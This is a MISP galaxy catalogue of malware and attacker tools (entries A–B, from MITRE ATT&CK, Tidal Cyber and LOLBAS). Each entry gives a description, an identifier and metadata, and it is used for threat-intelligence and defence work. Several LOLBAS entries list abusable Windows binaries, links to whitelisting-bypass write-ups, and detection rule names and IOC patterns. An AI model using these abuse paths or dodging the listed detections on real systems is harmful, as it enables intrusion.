type | ['malware'] |
Aria-body
Aria-body is a custom backdoor that has been used by Naikon since approximately 2017.[CheckPoint Naikon May 2020]
Internal MISP references
UUID 7ba79887-d496-47aa-8b71-df7f46329322
which can be used as unique global reference for Aria-body
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0456 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Arp
Arp displays and modifies information about a system's Address Resolution Protocol (ARP) cache. [TechNet Arp]
Internal MISP references
UUID 45b51950-6190-4572-b1a2-7c69d865251e
which can be used as unique global reference for Arp
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0099 |
source | MITRE |
tags | ['509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Aspnet_Compiler
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: ASP.NET Compilation Tool
Author: Jimmy (@bohops)
Paths: * c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe * c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Resources: * https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ * https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * Sigma: proc_creation_win_lolbin_aspnet_compiler.yml[Aspnet_Compiler.exe - LOLBAS Project]
Internal MISP references
UUID 42763dde-8226-4f31-a3ba-face2da84dd2
which can be used as unique global reference for Aspnet_Compiler
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5084 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ASPXSpy
ASPXSpy is a Web shell. It has been modified by Threat Group-3390 actors to create the ASPXTool version. [Dell TG-3390]
Internal MISP references
UUID a0cce010-9158-45e5-978a-f002e5c31a03
which can be used as unique global reference for ASPXSpy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0073 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Astaroth
Astaroth is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. [Cybereason Astaroth Feb 2019][Cofense Astaroth Sept 2018][Securelist Brazilian Banking Malware July 2020]
Internal MISP references
UUID ea719a35-cbe9-4503-873d-164f68ab4544
which can be used as unique global reference for Astaroth
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0373 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
AsyncRAT
AsyncRAT is an open-source remote access tool originally available through the NYANxCAT Github repository that has been used in malicious campaigns.[Morphisec Snip3 May 2021][Cisco Operation Layover September 2021][Telefonica Snip3 December 2021]
Internal MISP references
UUID d587efff-4699-51c7-a4cc-bdbd1b302ed4
which can be used as unique global reference for AsyncRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1087 |
source | MITRE |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '2feda37d-5579-4102-a073-aa02e82cb49f', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
at
at is used to schedule tasks on a system to run at a specified date or time.[TechNet At][Linux at]
Internal MISP references
UUID af01dc7b-a2bc-4fda-bbfe-d2be889c2860
which can be used as unique global reference for at
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0110 |
source | MITRE |
tags | ['5bc4c6c6-36df-4a53-920c-53e17d7027db', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Atbroker
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Helper binary for Assistive Technology (AT)
Author: Oddvar Moe
Paths: * C:\Windows\System32\Atbroker.exe * C:\Windows\SysWOW64\Atbroker.exe
Resources: * http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
Detection: * Sigma: proc_creation_win_lolbin_susp_atbroker.yml * Sigma: registry_event_susp_atbroker_change.yml * IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration * IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs * IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware[Atbroker.exe - LOLBAS Project]
Internal MISP references
UUID 2efae55c-86f3-4234-af26-1c75e922d81a
which can be used as unique global reference for Atbroker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5085 |
source | Tidal Cyber |
tags | ['85a29262-64bd-443c-9e08-3ee26aac859b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Atera Agent
Atera Agent is a legitimate remote administration tool (specifically a remote management and maintenance ("RMM") solution) that adversaries have used as a command and control tool for remote code execution, tool ingress, and persisting in victim environments.[U.S. CISA PaperCut May 2023]
Internal MISP references
UUID f8113a9f-a706-46df-8370-a9cef1c75f30
which can be used as unique global reference for Atera Agent
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5014 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '9a5ed991-6fe7-49fe-8536-91defc449b18', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '992bdd33-4a47-495d-883a-58010a2f0efb', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Atomic Stealer
Atomic Stealer is an information-stealing malware ("infostealer") designed to harvest passwords, cookies, and other sensitive information from macOS systems. It is often delivered via malicious download sites promoted via malvertising.[Malwarebytes 9 6 2023]
Internal MISP references
UUID ce914eea-8db9-425b-8ae2-a56a264b4951
which can be used as unique global reference for Atomic Stealer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS'] |
software_attack_id | S5314 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Attor
Attor is a Windows-based espionage platform that has been seen in use since 2013. Attor has a loadable plugin architecture to customize functionality for specific targets.[ESET Attor Oct 2019]
Internal MISP references
UUID 89c35e9f-b435-4f58-9073-f24c1ee8754f
which can be used as unique global reference for Attor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0438 |
source | MITRE |
type | ['malware'] |
AuditCred
AuditCred is a malicious DLL that has been used by Lazarus Group during their 2018 attacks.[TrendMicro Lazarus Nov 2018]
Internal MISP references
UUID d0c25f14-5eb3-40c1-a890-2ab1349dff53
which can be used as unique global reference for AuditCred
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0347 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
AutoIt backdoor
AutoIt backdoor is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. [Forcepoint Monsoon] This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.
Internal MISP references
UUID 3f927596-5219-49eb-bd0d-57068b0e04ed
which can be used as unique global reference for AutoIt backdoor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0129 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Automim
Researchers describe Automim as a "collection of .cmd, .vbs and .bat files that automate the execution" of the Mimikatz and LaZagne credential harvesting tools.[CrowdStrike Endpoint Security Testing Oct 2021]
Internal MISP references
UUID 984249bd-6421-4133-bd2a-25f330b4b441
which can be used as unique global reference for Automim
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5277 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
AuTo Stealer
AuTo Stealer is malware written in C++ has been used by SideCopy since at least December 2021 to target government agencies and personnel in India and Afghanistan.[MalwareBytes SideCopy Dec 2021]
Internal MISP references
UUID 649a4cfc-c0d0-412d-a28c-1bd4ed604ea8
which can be used as unique global reference for AuTo Stealer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1029 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Avaddon
Avaddon is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.[Awake Security Avaddon][Arxiv Avaddon Feb 2021]
Internal MISP references
UUID bad92974-35f6-4183-8024-b629140c6ee6
which can be used as unique global reference for Avaddon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0640 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Avenger
Avenger is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]
Internal MISP references
UUID e5ca0192-e905-46a1-abef-ce1119c1f967
which can be used as unique global reference for Avenger
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0473 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
AvosLocker
AvosLocker is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, AvosLocker had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.[Malwarebytes AvosLocker Jul 2021][Trend Micro AvosLocker Apr 2022][Joint CSA AvosLocker Mar 2022]
Internal MISP references
UUID e792dc8d-b0f4-5916-8850-a61ff53125d0
which can be used as unique global reference for AvosLocker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S1053 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'c3779a84-8132-4c62-be2f-9312ad41c273', 'ce9f1048-09c1-49b0-a109-dd604afbf3cd', 'fe3eb26d-6daa-4f82-b0dd-fc1e2fffbc2b', '9e4936f0-e3b7-4721-a638-58b2d093b2f2', '24448a05-2337-4bc9-a889-a83f2fd1f3ad', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Azorult
Azorult is a commercial Trojan that is used to steal information from compromised hosts. Azorult has been observed in the wild as early as 2016. In July 2018, Azorult was seen used in a spearphishing campaign against targets in North America. Azorult has been seen used for cryptocurrency theft. [Unit42 Azorult Nov 2018][Proofpoint Azorult July 2018]
Internal MISP references
UUID cc68a7f0-c955-465f-bee0-2dacbb179078
which can be used as unique global reference for Azorult
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0344 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Babuk
Babuk is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of Babuk employ a "Big Game Hunting" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.[Sogeti CERT ESEC Babuk March 2021][McAfee Babuk February 2021][CyberScoop Babuk February 2021]
Internal MISP references
UUID 0dc07eb9-66df-4116-b1bc-7020ca6395a1
which can be used as unique global reference for Babuk
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0638 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'b5962a84-f1c7-4d0d-985c-86301db95129', '12124060-8392-49a3-b7b7-1dde3ebc8e67', '915e7ac2-b266-45d7-945c-cb04327d6246', 'd713747c-2d53-487e-9dac-259230f04460', 'fde4c246-7d2d-4d53-938b-44651cf273f1', '964c2590-4b52-48c6-afff-9a6d72e68908', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', 'a2e000da-8181-4327-bacd-32013dbd3654'] |
type | ['malware'] |
BabyShark
BabyShark is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. [Unit42 BabyShark Feb 2019]
Internal MISP references
UUID ebb824a2-abff-4bfd-87f0-d63cb02b62e6
which can be used as unique global reference for BabyShark
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0414 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BackConfig
BackConfig is a custom Trojan with a flexible plugin architecture that has been used by Patchwork.[Unit 42 BackConfig May 2020]
Internal MISP references
UUID 2763ad8c-cf4e-42eb-88db-a40ff8f96cf9
which can be used as unique global reference for BackConfig
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0475 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Backdoor.Oldrea
Backdoor.Oldrea is a modular backdoor that used by Dragonfly against energy companies since at least 2013. Backdoor.Oldrea was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.[Symantec Dragonfly][Gigamon Berserk Bear October 2021][Symantec Dragonfly Sept 2017]
Internal MISP references
UUID f7cc5974-767c-4cb4-acc7-36295a386ce5
which can be used as unique global reference for Backdoor.Oldrea
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0093 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BACKSPACE
BACKSPACE is a backdoor used by APT30 that dates back to at least 2005. [FireEye APT30]
Internal MISP references
UUID d0daaa00-68e1-4568-bb08-3f28bcd82c63
which can be used as unique global reference for BACKSPACE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0031 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Backstab
Backstab is a tool used to terminate antimalware-protected processes.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 5a9a7a54-21cb-4a5c-bef0-d37f8678bf46
which can be used as unique global reference for Backstab
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5026 |
source | Tidal Cyber |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'd469efcf-4feb-4149-9c0f-c4b7821960bd', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
BADCALL
BADCALL is a Trojan malware variant used by the group Lazarus Group. [US-CERT BADCALL]
Internal MISP references
UUID d7aa53a5-0912-4952-8f7f-55698e933c3b
which can be used as unique global reference for BADCALL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0245 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BADFLICK
BADFLICK is a backdoor used by Leviathan in spearphishing campaigns first reported in 2018 that targeted the U.S. engineering and maritime industries.[FireEye Periscope March 2018][Accenture MUDCARP March 2019]
Internal MISP references
UUID 8c454294-81cb-45d0-b299-818994ad3e6f
which can be used as unique global reference for BADFLICK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0642 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BADHATCH
BADHATCH is a backdoor that has been utilized by FIN8 since at least 2019. BADHATCH has been used to target the insurance, retail, technology, and chemical industries in the United States, Canada, South Africa, Panama, and Italy.[Gigamon BADHATCH Jul 2019][BitDefender BADHATCH Mar 2021]
Internal MISP references
UUID 16481e0f-49d5-54c1-a1fe-16d9e7f8d08c
which can be used as unique global reference for BADHATCH
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1081 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BADNEWS
BADNEWS is malware that has been used by the actors responsible for the Patchwork campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. [Forcepoint Monsoon] [TrendMicro Patchwork Dec 2017]
Internal MISP references
UUID 34c24d27-c779-42a4-9f61-3f0d3fea6fd4
which can be used as unique global reference for BADNEWS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0128 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BadPatch
BadPatch is a Windows Trojan that was used in a Gaza Hackers-linked campaign.[Unit 42 BadPatch Oct 2017]
Internal MISP references
UUID 10e76722-4b52-47f6-9276-70e95fecb26b
which can be used as unique global reference for BadPatch
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0337 |
source | MITRE |
type | ['malware'] |
BadPotato
BadPotato is an open-source software project that, according to its GitHub page, can be used for privilege escalation purposes.[GitHub BeichenDream BadPotato]
Internal MISP references
UUID 4b59bf81-d351-436e-aebc-f0111a892395
which can be used as unique global reference for BadPotato
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5304 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bad Rabbit
Bad Rabbit is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. Bad Rabbit has also targeted organizations and consumers in Russia. [Secure List Bad Rabbit][ESET Bad Rabbit][Dragos IT ICS Ransomware]
Internal MISP references
UUID a1d86d8f-fa48-43aa-9833-7355750e455c
which can be used as unique global reference for Bad Rabbit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0606 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '5a463cb3-451d-47f7-93e4-1886150697ce', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bandook
Bandook is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. Bandook has been used by Dark Caracal, as well as in a separate campaign referred to as "Operation Manul".[EFF Manul Aug 2016][Lookout Dark Caracal Jan 2018][CheckPoint Bandook Nov 2020]
Internal MISP references
UUID 5c0f8c35-88ff-40a1-977a-af5ce534e932
which can be used as unique global reference for Bandook
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0234 |
source | MITRE |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bankshot
Bankshot is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, Lazarus Group used the Bankshot implant in attacks against the Turkish financial sector. [McAfee Bankshot]
Internal MISP references
UUID 24b8471d-698f-48cc-b47a-8fbbaf28b293
which can be used as unique global reference for Bankshot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0239 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bash
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: File used by Windows subsystem for Linux
Author: Oddvar Moe
Paths: * C:\Windows\System32\bash.exe * C:\Windows\SysWOW64\bash.exe
Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * Sigma: proc_creation_win_lolbin_bash.yml * IOC: Child process from bash.exe[Bash.exe - LOLBAS Project]
Internal MISP references
UUID cef3a09e-22ca-43dc-ad4a-95741a3b85ff
which can be used as unique global reference for Bash
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5086 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Bat Armor
Bat Armor is a tool used to generate .bat files using PowerShell scripts.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 628037d4-962d-4f58-b32d-241d739bc62d
which can be used as unique global reference for Bat Armor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5027 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Bazar
Bazar is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. Bazar reportedly has ties to TrickBot campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.[Cybereason Bazar July 2020]
Internal MISP references
UUID b35d9817-6ead-4dbd-a2fa-4b8e217f8eac
which can be used as unique global reference for Bazar
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0534 |
source | MITRE |
tags | ['818c3d93-c010-44f4-82bc-b63b4bc6c3c2', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BBK
BBK is a downloader that has been used by BRONZE BUTLER since at least 2019.[Trend Micro Tick November 2019]
Internal MISP references
UUID 3daa5ae1-464e-4c0a-aa46-15264a2a0126
which can be used as unique global reference for BBK
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0470 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
BBSRAT
BBSRAT is malware with remote access tool functionality that has been used in targeted compromises. [Palo Alto Networks BBSRAT]
Internal MISP references
UUID be4dab36-d499-4ac3-b204-5e309e3a5331
which can be used as unique global reference for BBSRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0127 |
source | MITRE |
type | ['malware'] |
BendyBear
BendyBear is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, BendyBear shares a variety of features with Waterbear, malware previously attributed to the Chinese cyber espionage group BlackTech.[Unit42 BendyBear Feb 2021]
Internal MISP references
UUID a114a498-fcfd-4e0a-9d1e-e26750d71af8
which can be used as unique global reference for BendyBear
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0574 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Bginfo
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Background Information Utility included with SysInternals Suite
Author: Oddvar Moe
Paths: * No fixed path
Resources: * https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
Detection: * Sigma: proc_creation_win_lolbin_bginfo.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[Bginfo.exe - LOLBAS Project]
Internal MISP references
UUID fe926654-0cff-4e8e-b192-2fa1eb8a9a67
which can be used as unique global reference for Bginfo
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5207 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
BianLian Ransomware (Backdoor)
This Software object represents the custom backdoor tool used during intrusions conducted by the BianLian Ransomware Group.[U.S. CISA BianLian Ransomware May 2023][BianLian Ransomware Gang Gives It a Go! | [redacted]]
Delivers: TeamViewer[U.S. CISA BianLian Ransomware May 2023], Atera Agent[U.S. CISA BianLian Ransomware May 2023], Splashtop[U.S. CISA BianLian Ransomware May 2023], AnyDesk[U.S. CISA BianLian Ransomware May 2023]
Internal MISP references
UUID a4fb341d-8010-433f-b8f1-a8781f961435
which can be used as unique global reference for BianLian Ransomware (Backdoor)
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5001 |
source | Tidal Cyber |
